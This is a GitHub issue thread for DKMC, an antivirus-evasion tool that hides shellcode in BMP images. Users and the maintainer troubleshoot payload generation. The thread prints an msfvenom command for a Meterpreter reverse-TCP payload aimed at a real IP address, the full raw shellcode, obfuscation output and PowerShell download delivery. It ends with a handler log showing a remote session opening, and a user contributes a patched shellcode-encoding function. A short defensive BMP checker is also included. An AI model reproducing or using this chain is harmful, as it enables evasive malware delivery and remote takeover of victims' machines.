Mr-Un1k0d3r / DKMC

DKMC - Dont kill my cat - Malicious payload evasion tool

shows error

amainyebriggs opened this issue · comments

Shellcode format should be \x00\x00\x00; you are probably not using the right format.

How do I do that?

I used the SC; it's still the same error.

Hey man. Great work with this tool. However, I'm also getting the error message after using sc command.

Before launching the tool make sure to create the output folder

$ git clone https://github.com/Mr-Un1k0d3r/DKMC
$ cd DKMC
$ mkdir output

msfvenom -a x86 -p windows/meterpreter/reverse_tcp -e generic/none -f raw LPORT=8080 LHOST=24.37.41.158 > payload

(shellcode)>>> set source /root/payload
[+] source value is set.

(shellcode)>>> run
[+] Shellcode:
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5

(shellcode)>>> exit

(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
[+] shellcode value is set.

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x35af22c7
[+] Shellcode size 0x12b (299) bytes
[+] Adding 1 bytes of padding
[+] Generating magic bytes 0xa1957f94
[+] Final shellcode length is 0x17b (379) bytes
[+] New BMP header set to 0x424de980c50300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/root/DKMC/output/output-1505309035.bmp)


If you are following this path it should work as expected.
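A defensive check built from the header values in the output above, as an added example that is not part of the thread or of DKMC: it flags a BMP whose size field disagrees with the file length, whose bytes 2-6 decode as an x86 `jmp` into the file, or which holds more pixel data than its declared height renders. The function names, the all-black 24-bit sample image and the standard 54-byte header layout are assumptions of this example; only the header bytes and the 300 x 275 / 270 dimensions come from the page.

```python
import struct

FILE_HDR = struct.Struct("<2sIHHI")       # bfType, bfSize, bfReserved1, bfReserved2, bfOffBits
INFO_HDR = struct.Struct("<IiiHHIIiiII")  # 40-byte BITMAPINFOHEADER
HEADERS_LEN = FILE_HDR.size + INFO_HDR.size  # 14 + 40


def make_bmp(width, height, bpp=24):
    """Constructed sample: an all-black, uncompressed BMP with honest headers."""
    stride = (width * bpp + 31) // 32 * 4          # rows are padded to 4 bytes
    pixels = bytes(stride * height)
    info = INFO_HDR.pack(40, width, height, 1, bpp, 0, len(pixels), 2835, 2835, 0, 0)
    head = FILE_HDR.pack(b"BM", HEADERS_LEN + len(pixels), 0, 0, HEADERS_LEN)
    return head + info + pixels


def tamper_like_page(bmp):
    """Constructed sample: apply only the two header edits the tool output reports
    (header 0x424de980c50300, height 0x0e010000). Pixel data stays all zero."""
    out = bytearray(bmp)
    out[2:7] = bytes.fromhex("e980c50300")   # bytes following "BM"
    out[22:26] = struct.pack("<i", 270)      # biHeight
    return bytes(out)


def jmp_target(data):
    """If byte 2 is 0xE9 (x86 jmp rel32), return the file offset it points to."""
    if len(data) < 7 or data[2] != 0xE9:
        return None
    rel32 = struct.unpack_from("<i", data, 3)[0]
    return 2 + 5 + rel32                     # end of the 5-byte jmp + displacement


def check_bmp(data):
    """Return (code, detail) findings for one BMP given as bytes; [] means clean."""
    if len(data) < HEADERS_LEN or data[:2] != b"BM":
        return [("not-bmp", "missing BM magic or truncated headers")]
    _, bf_size, _, _, off_bits = FILE_HDR.unpack_from(data, 0)
    bi_size, width, height, _, bpp, compression = INFO_HDR.unpack_from(data, 14)[:6]
    if bi_size < 40:
        return [("unsupported-header", "not a BITMAPINFOHEADER-style BMP")]
    findings = []

    # 1. Image writers store the real file length in bfSize.
    if bf_size != len(data):
        findings.append(("size-mismatch",
                         "bfSize=%d but file is %d bytes" % (bf_size, len(data))))

    # 2. The same bytes, read as code, may be a jump into the pixel area.
    target = jmp_target(data)
    if target is not None and off_bits <= target < len(data):
        findings.append(("jmp-in-header",
                         "bytes 2-6 decode as jmp to offset %d (%d bytes before EOF)"
                         % (target, len(data) - target)))

    # 3. Uncompressed images only: data beyond width x height is never rendered.
    if compression == 0 and width > 0 and 0 < off_bits <= len(data):
        stride = (width * bpp + 31) // 32 * 4
        extra = len(data) - off_bits - stride * abs(height)
        if extra > 0:
            findings.append(("hidden-rows",
                             "%d bytes present beyond the declared %d rows"
                             % (extra, abs(height))))
    return findings


if __name__ == "__main__":
    clean = make_bmp(300, 275)               # "Image size is 300 x 275"
    for name, blob in (("clean", clean), ("tampered", tamper_like_page(clean))):
        print(name, check_bmp(blob) or "no findings")
```

On the constructed tampered sample the jump lands 379 bytes before the end of the file, the same figure the tool prints as the final shellcode length, and the reduced height leaves five rows (4500 bytes) that no viewer draws.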

I have followed the steps; it still outputs the same error. I am using Kali Linux i386.

Yeah still having issues. Testing on Windows 10 Python 2.7

(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
[+] shellcode value is set.

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x11943dc6
[+] Shellcode size 0x12b (299) bytes
[+] Adding 1 bytes of padding
[+] Generating magic bytes 0x37621f45
[-] >>> Something when wrong during the obfuscation. Wrong shellcode format?

Can you try to update the gen.py with the one I attached and show me the error stack trace?

The gen.py is located in the module/ folder.

gen.txt

Possible missing import?

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x5242695b
[+] Shellcode size 0xc7 (199) bytes
[+] Adding 1 bytes of padding
[+] Generating magic bytes 0xf2e29eaaL
Traceback (most recent call last):
  File "dkmc.py", line 39, in <module>
    mod.show_menu()
  File "C:\DKMC-master\module\module.py", line 21, in show_menu
    self.do_action()
  File "C:\DKMC-master\module\module.py", line 42, in do_action
    self.exec_action(data)
  File "C:\DKMC-master\module\module.py", line 57, in exec_action
    self.run_action()
  File "C:\DKMC-master\module\gen.py", line 44, in run_action
    shellcode = self.gen_shellcode(self.vars["shellcode"][0])
  File "C:\DKMC-master\module\gen.py", line 76, in gen_shellcode
    shellcode = hex(magic)[2:].decode("hex") + shellcode
  File "C:\Python27\lib\encodings\hex_codec.py", line 42, in hex_decode
    output = binascii.a2b_hex(input)
TypeError: Odd-length string

Okay, this is caused by your copy-paste; it probably adds some \r\n at the end when you copy it. To avoid that I'll strip the input before processing.

pushed the patch to remove \r & \n

git pull and you should be good

Still no luck with your code unfortunately.

I have been playing around with gen.py, specifically the gen_shellcode function. It seems the shellcode length gets messed up when adding other bytes.

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x128b4be7
[+] Shellcode size 0x31c (796) bytes
[+] Generating magic bytes 0x4349e106
[+] Shellcode size 0x324 (804) bytes
[+] Shellcode size 0x324 (804) bytes
[+] Shellcode size 0x377 (887) bytes
[+] Shellcode size 0x377 (887) bytes
[+] Adding 1 bytes of padding
[+] Shellcode size 0x378 (888) bytes
[+] Final shellcode length is 0x370 (880) bytes
[+] New BMP header set to 0x424de98bc30300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (C:\DKMC-master/output/output-1505416245.bmp)

This doesn't let me execute the shell code but it's progress

This is the expected behavior. This module only generates the final payload. You can now use the image C:\DKMC-master/output/output-1505416245.bmp to deliver your payload.

The ps and web module allow you to generate the powershell one liner pretty easily.

Powershell and web server work perfectly. But I'm still not getting code execution. I had to remove in the pad_shellcode shellcode.replace("\x","").decode. I doubt that the format is correct to execute. I've no idea what to do.

Here is the complete walkthrough of how to get a shell; it works #1 on my side.

Tool output:

=====================================================================
|                                                                   |
| Module to generate shellcode out of raw metasploit shellcode file |
|                                                                   |
=====================================================================


Allowed options:

        [*] (show)      Show module variables
        [*] (set)       Set value (set key value)
        [*] (run)       Run the module
        [*] (exit)      Go back to the main menu

Module Variables description:

        source      Path to the raw shellcode file


Current variable value:

        source      =

(shellcode)>>> set source SHELLCODE
        [+] source value is set.

(shellcode)>>> run
        [+] Shellcode:
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5

(shellcode)>>> exit

=================================================================================
|                                                                               |
| Module to generate malicious Bitmap image with embedded obfuscation shellcode |
|                                                                               |
=================================================================================


Allowed options:

        [*] (show)      Show module variables
        [*] (set)       Set value (set key value)
        [*] (run)       Run the module
        [*] (exit)      Go back to the main menu

Module Variables description:

        debug       Show debug output. More verbose
        source      Image source file path
        shellcode   Shellcode payload using \x41\x41 format
        output      Output file path


Current variable value:

        debug       = false
        source      = sample/default.bmp
        shellcode   =
        output      = output/output.bmp

(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
        [+] shellcode value is set.

(generate)>>> run
        [+] Image size is 300 x 275
        [+] Generating obfuscation key 0x3b1bf4e3
        [+] Shellcode size 0x12b (299) bytes
        [+] Adding 1 bytes of padding
        [+] Generating magic bytes 0xdfe6936e
        [+] Final shellcode length is 0x17b (379) bytes
        [+] New BMP header set to 0x424de980c50300
        [+] New height is 0x0e010000 (270)
        [+] Successfully save the image. (/home/me/DKMC/output/output.bmp)

(generate)>>> exit

=========================================
|                                       |
| Module to generate Powershell payload |
|                                       |
=========================================


Allowed options:

        [*] (show)      Show module variables
        [*] (set)       Set value (set key value)
        [*] (run)       Run the module
        [*] (exit)      Go back to the main menu

Module Variables description:

        url         Url that point to the malicious image
        rand        Use random variables name


Current variable value:

        url         =
        rand        = true

(powershell)>>> set url http://10.0.0.153:8080/output.bmp
        [+] url value is set.

(powershell)>>> run
        [+] Powershell script:

(powershell)>>> exit

=================================
|                               |
| Module to launch a web server |
|                               |
=================================


Allowed options:

        [*] (show)      Show module variables
        [*] (set)       Set value (set key value)
        [*] (run)       Run the module
        [*] (exit)      Go back to the main menu

Module Variables description:

        folder      Base folder used to deliver files
        certificate Certificate path
        port        Port used to bind the web server
        https       Use HTTPS


Current variable value:

        folder      = /home/charles.hamilton/DKMC/output/
        certificate = core/util/cert/default.pem
        port        = 80
        https       = false

(web)>>> run
        [+] Starting web server on port 80


        [+] Stopping web server

(web)>>> set port 8080
        [+] port value is set.

(web)>>> run
        [+] Starting web server on port 8080

On the PowerShell console I ran the PowerShell one liner:


Then, in the tool, notice that the payload is fetched:

(web)>>> run
        [+] Starting web server on port 8080

10.0.0.153 - - [14/Sep/2017 16:44:35] "GET /output.bmp HTTP/1.1" 200 -

        [+] Stopping web server

On the metasploit console:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > set lhost 24.37.41.158
lhost => 24.37.41.158
msf exploit(handler) > exploit

[*] Started reverse handler on 24.37.41.158:8080
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 24.37.41.154
[*] Meterpreter session 1 opened (24.37.41.158:8080 -> 24.37.41.154:29608) at 2017-09-14 17:00:05 -0400

meterpreter >

I'm getting an issue where it won't let me paste the full amount of shellcode. Any idea on that one?

(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x

It won't let me enter any more text.

It may be a limitation of your terminal. I used the same shellcode that you pasted and added more to it.

=================================================================================
|                                                                               |
| Module to generate malicious Bitmap image with embedded obfuscation shellcode |
|                                                                               |
=================================================================================


Allowed options:

        [*] (show)      Show module variables
        [*] (set)       Set value (set key value)
        [*] (run)       Run the module
        [*] (exit)      Go back to the main menu

Module Variables description:

        debug       Show debug output. More verbose
        source      Image source file path
        shellcode   Shellcode payload using \x41\x41 format
        output      Output file path


Current variable value:

        debug       = false
        source      = sample/default.bmp
        shellcode   =
        output      = output/output-1505429835.bmp

(generate)>>> set shellcode set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\xde\xad\xde\xad\xde\xad\xde\xad
        [+] shellcode value is set.

(generate)>>> show
        debug       = false
        source      = sample/default.bmp
        shellcode   = set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\xde\xad\xde\xad\xde\xad\xde\xad
        output      = output/output-1505429835.bmp

(generate)>>>

The show command shows the content of the "variable", which contains the whole string without issue. I tried on a Cygwin terminal on Windows and an Ubuntu terminal and neither had the issue. The input is captured using the raw_input() function; there is no limitation implemented on my side.

yup seems to be an osx-ism. works fine in ubuntu. if i track it down i'll do an additional comment.

ty!

Glad you figured it out.

Finally managed to get it to run. The problem seems to be in the random int generation as the hex value length was uneven. I worked round this by cutting the hex. This is my modified gen_shellcode function.

def gen_shellcode(self, shellcode):
    # Python 2 code (str.decode("hex"), bare print), as used by the tool.
    key = self.gen_key()
    self.ui.print_msg("Generating obfuscation key 0x%s" % key.encode("hex"))
    shellcode = self.pad_shellcode(shellcode)
    self.ui.print_msg(len(shellcode))
    magic = self.gen_magic()

    self.ui.print_msg("Generating magic bytes %s" % hex(magic))
    # Workaround: hex() of a Python 2 long ends in "L" (0xf2e29eaaL above), so
    # [2:10] keeps at most 8 hex digits and drops the suffix. A value below
    # 0x10000000 has fewer digits, so the slice alone does not cover that case.
    self.ui.print_msg((hex(magic)[2:10]))
    shellcode = hex(magic)[2:10].decode("hex") + shellcode
    self.ui.print_msg(len(shellcode))
    shellcode = self.xor_payload(shellcode, key)
    self.ui.print_msg(len(shellcode))
    size = len(shellcode)
    shellcode = self.set_decoder(hex(magic)[2:10].decode("hex"), (size - 4)) + shellcode
    self.ui.print_msg(len(shellcode))
    # Each [RAND1]..[RAND4] placeholder gets its own freshly generated value.
    for i in range(1, 5):
        shellcode = shellcode.replace("[RAND" + str(i) + "]", self.gen_pop(hex(self.gen_magic())[2:10].decode("hex")))
    self.ui.print_msg("Final shellcode length is %s (%d) bytes" % (hex(len(shellcode)), len(shellcode)))
    if self.is_debug():
        print
    return shellcode

I'm sure this will solve the original error message of this thread

Interesting, I'll try to reproduce the bug on my side. Kind of odd that the hex function returns a different output on Windows.

I think there's one still missing on line 73

fixed thanks.